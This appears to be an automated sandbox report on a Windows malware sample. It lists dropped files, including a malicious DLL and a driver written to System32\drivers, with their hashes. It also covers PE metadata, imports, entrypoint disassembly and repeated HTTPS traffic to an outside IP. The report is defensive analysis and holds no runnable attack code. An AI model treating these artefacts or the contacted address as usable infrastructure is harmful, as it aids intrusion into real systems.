                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                    C:\Users\user\Documents\WordpadFilter.db

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:GIF image data, version 89a, 10 x 10
                                                    Category:dropped
                                                    Size (bytes):8228
                                                    Entropy (8bit):7.978923000469196
                                                    Encrypted:false
                                                    SSDEEP:192:hBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:hBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                    MD5:4ACFB0FC0A376754784BB427C95ECCA7
                                                    SHA1:63A2FB89DAB3482A1A74C9DCEA2E27B72FF626E4
                                                    SHA-256:983CA2EC77C3F0121DE7A57730F270FA5F91AEA40EBC46400F497DA7E59480C1
                                                    SHA-512:6A3CFB935D051392A73D978A7B6654A03F2A834771C93D157E506F7EF8B2A906BDF1B6383BCB3BD44197C750ED031A3FA8F99F6BEE961146BF37B719D1BDE340
                                                    Malicious:false
                                                    Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                                    C:\Users\user\Documents\vselog.dll

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):122880
                                                    Entropy (8bit):6.002051339486298
                                                    Encrypted:false
                                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FY:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gY
                                                    MD5:F6FA830A46CCFEE64B35E86AC7C4DEB8
                                                    SHA1:22B29F9749126142F7B3266E13FE83F05C1D09E6
                                                    SHA-256:E8F824DA259F7B4A76259DF16587985CAA5067B7BC8E811A63C05152A1A9F69F
                                                    SHA-512:8166B8CCFBC1C6AFC2E8B8BC09BA9E9FBAA72195985DBE6FFE4DD337C14FD62F5661103168237800242D5B759A5113AFF128CC9E6B61E30B30AE83DE4800A05A
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                                    C:\Windows\System32\drivers\189atohci.sys

                                                    Download File
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):28272
                                                    Entropy (8bit):6.229054372792222
                                                    Encrypted:false
                                                    SSDEEP:384:83YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/t:8OUkgfdZ9pRyv+uPzCMHo3q4tDghr
                                                    MD5:8EF89CB07F0E0F58C571E82CDFA6C4FE
                                                    SHA1:156DB3F0ACCE57E295FE1E25B96D8A7E0D84D444
                                                    SHA-256:50C1A741E10BD824785A2B48E52425B4B6C20C614B19C5AC278CECAB31A9E51B
                                                    SHA-512:DDA533712B36D6B192BD6A2978E727BE8C06DB58BA387D607C41FFFEB9BFF228106EA36D99BC55EE2E957D40E449D329D8DBBC9CD6CE9CC2646B5459CC74E742
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................|..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):0.08192237708325625
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:2749837485743-7684385786.05.exe
                                                    File size:30'885'376 bytes
                                                    MD5:5b695fabfcd1da54f7c193ef5f11ef6a
                                                    SHA1:8097a65d6e89522851b53b831aaf45afb9f0267b
                                                    SHA256:697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
                                                    SHA512:1f917fbed3c8a8b0d4896ed2dddd4040fb91565ee40c7513ebccd0ebd0371a860fcb5b1cb63fbfdbfa6ed2869cbaa400a27afbdeb47c78d4539579dc738ef37a
                                                    SSDEEP:3072:yBz0z6OFlTEzEQUZFtabsn8cZ1YQpjZoSc2faC1r/wDJPjYR+rH/:yd0GulTEo3tao8k1xv3aC1r+jYR+T
                                                    TLSH:77679F5A326410F9D5BFD178C9A20A46D772B866437293CF063446AADF337D0AD3B362
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C+...J...J...J....O..J...2B..J...J..zJ....z."J....{.jJ....K..J....L..J..Rich.J..........................PE..d...i..N..........#

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x140008c38
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4EF3A569 [Thu Dec 22 21:47:21 2011 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:2
                                                    File Version Major:5
                                                    File Version Minor:2
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:2
                                                    Import Hash:e055d655d830344970c4208138facfc1

                                                    Entrypoint Preview

                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    call 00007FEDCCC1DB34h
                                                    dec eax
                                                    add esp, 28h
                                                    jmp 00007FEDCCC1161Eh
                                                    int3
                                                    int3
                                                    dec eax
                                                    mov dword ptr [000146F5h], ecx
                                                    ret
                                                    dec eax
                                                    mov dword ptr [esp+10h], ebx
                                                    dec eax
                                                    mov dword ptr [esp+18h], esi
                                                    push ebp
                                                    push edi
                                                    inc ecx
                                                    push esp
                                                    dec eax
                                                    lea ebp, dword ptr [esp-000004F0h]
                                                    dec eax
                                                    sub esp, 000005F0h
                                                    dec eax
                                                    mov eax, dword ptr [00012AF8h]
                                                    dec eax
                                                    xor eax, esp
                                                    dec eax
                                                    mov dword ptr [ebp+000004E0h], eax
                                                    inc ecx
                                                    mov edi, eax
                                                    mov esi, edx
                                                    mov ebx, ecx
                                                    cmp ecx, FFFFFFFFh
                                                    je 00007FEDCCC191E7h
                                                    call 00007FEDCCC1DB96h
                                                    and dword ptr [esp+70h], 00000000h
                                                    dec eax
                                                    lea ecx, dword ptr [esp+74h]
                                                    xor edx, edx
                                                    inc ecx
                                                    mov eax, 00000094h
                                                    call 00007FEDCCC1895Bh
                                                    dec esp
                                                    lea ebx, dword ptr [esp+70h]
                                                    dec eax
                                                    lea eax, dword ptr [ebp+10h]
                                                    dec eax
                                                    lea ecx, dword ptr [ebp+10h]
                                                    dec esp
                                                    mov dword ptr [esp+48h], ebx
                                                    dec eax
                                                    mov dword ptr [esp+50h], eax
                                                    call dword ptr [0000D581h]
                                                    dec esp
                                                    mov esp, dword ptr [ebp+00000108h]
                                                    dec eax
                                                    lea edx, dword ptr [esp+40h]
                                                    dec ecx
                                                    mov ecx, esp
                                                    inc ebp
                                                    xor eax, eax
                                                    call 00007FEDCCC2546Dh
                                                    dec eax
                                                    test eax, eax
                                                    je 00007FEDCCC19219h
                                                    dec eax
                                                    and dword ptr [esp+38h], 00000000h
                                                    dec eax
                                                    mov edx, dword ptr [esp+40h]
                                                    dec eax
                                                    lea ecx, dword ptr [esp+60h]
                                                    dec eax
                                                    mov dword ptr [esp+30h], ecx
                                                    dec eax
                                                    lea ecx, dword ptr [esp+58h]
                                                    dec esp
                                                    mov ecx, eax

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ASM] VS2010 SP1 build 40219
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [C++] VS2010 SP1 build 40219
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1a3140x78.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d7a0000x5c8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d790000xfb4.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x164400x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x160000x3d0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x1424e0x144002818c01f5b3619f5d08841e50f9f34aeFalse0.5304542824074074data6.38689177603382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x160000x4fb20x5000b5004cfda8e71f2299dfabff87abc568False0.343359375data4.861556529219821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x1b0000x1d5d6000x1d59800c3446221fb4627522fbc3e5c902154fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x1d790000xfb40x1000a1ff09aebd65854c71ab76238d270b83False0.485595703125data4.980072699437705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1d7a0000x5c80x60056a4da9c71a7d95e35ee0ccb4e062a95False0.419921875data4.212061586306468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_VERSION0x1d7a0a00x3ccdataEnglishUnited States0.411522633744856
                                                    RT_MANIFEST0x1d7a46c0x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786

                                                    Imports

                                                    DLLImport
                                                    KERNEL32.dllDisconnectNamedPipe, ConnectNamedPipe, ReadFile, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, IsBadStringPtrW, WideCharToMultiByte, SetThreadPriority, GetCurrentThread, CreateNamedPipeW, Sleep, InitializeCriticalSection, DeleteCriticalSection, SetPriorityClass, GetCurrentProcess, FreeLibrary, CreateFileW, LoadLibraryA, EnterCriticalSection, GetProcessHeap, SetEndOfFile, GetStringTypeW, LCMapStringW, SetFilePointer, MultiByteToWideChar, WriteConsoleW, HeapReAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetLastError, WaitNamedPipeW, CloseHandle, GetSystemTime, GetTempPathW, GetProcAddress, GetModuleFileNameW, GetConsoleMode, GetConsoleCP, SetStdHandle, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, LeaveCriticalSection, WriteFile, FlushFileBuffers, ExitThread, ResumeThread, CreateThread, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, TerminateProcess, HeapFree, HeapAlloc, RaiseException, RtlPcToFileHeader, RtlUnwindEx, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, LoadLibraryW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSetInformation, GetVersion, HeapCreate, VirtualAlloc
                                                    USER32.dllwsprintfW, PostMessageW, MessageBoxW, PostQuitMessage, DefWindowProcW, EndPaint, GetMessageW, TranslateMessage, DispatchMessageW, CreateWindowExW, ShowWindow, UpdateWindow, RegisterClassExW, BeginPaint
                                                    GDI32.dllStartDocW, StartPage, EndPage, EndDoc, DeleteDC, CreateDCW
                                                    WINSPOOL.DRVClosePrinter, DocumentPropertiesW, GetPrinterDriverW, OpenPrinterW
                                                    ADVAPI32.dllSetSecurityDescriptorDacl, GetUserNameW, InitializeSecurityDescriptor

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 6, 2025 04:43:26.704183102 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:26.704253912 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:26.704319000 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:26.715024948 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:26.715042114 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:27.897541046 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:27.897644997 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:27.898205042 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:27.898269892 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:27.956360102 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:27.956389904 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:27.956743956 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:27.958825111 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:27.960669041 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.007343054 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.270066977 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.270133018 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.270164967 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.270279884 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.270323992 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.270395041 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.270437002 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.289302111 CET49974443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.289331913 CET4434997439.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.394443989 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.394504070 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:28.394593000 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.394848108 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:28.394860029 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.586813927 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.587013006 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.587846041 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.587856054 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.588016987 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.588021994 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906294107 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906317949 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906400919 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.906438112 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906455040 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.906836987 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906871080 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906893015 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.906898022 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:29.906918049 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:29.906939983 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.121598959 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.121752977 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.121779919 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.121834040 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.122059107 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.122121096 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.122150898 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.122196913 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.123158932 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.123184919 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.123218060 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.123225927 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.123253107 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.123284101 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.124134064 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.124198914 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.339761972 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.339812994 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.339838028 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.339863062 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.339879990 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.339915991 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.340126038 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.340178013 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.340450048 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.340492964 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.341123104 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.341152906 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.341171980 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.341178894 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.341207027 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.341218948 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.341799021 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.341850042 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.342452049 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.342483997 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.342510939 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.342518091 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.342545986 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.342561960 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.343424082 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.343453884 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.343532085 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.343538046 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.343573093 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.344264030 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.344310999 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.344360113 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.344429970 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.345267057 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.345308065 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.560592890 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.560643911 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.560657978 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.560682058 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.560697079 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.560733080 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.560754061 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.560868025 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.560921907 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561253071 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561306953 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561330080 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561376095 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561690092 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561717033 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561734915 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561742067 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561767101 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561785936 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561799049 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561849117 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561856031 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561894894 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.561897039 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.561944008 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.595793962 CET49975443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.595809937 CET4434997539.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.620502949 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.620541096 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:30.620634079 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.620949030 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:30.620963097 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:31.822853088 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:31.823029041 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:31.823901892 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:31.823911905 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:31.824101925 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:31.824110985 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.159508944 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.159531116 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.159708977 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.159725904 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.160048008 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.160110950 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.160118103 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.160162926 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.161144018 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.161207914 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.164846897 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.164921045 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.250063896 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.250190973 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.250257015 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.250314951 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.250317097 CET49976443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:32.250324965 CET4434997639.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:32.250360966 CET49976443192.168.2.939.103.20.26
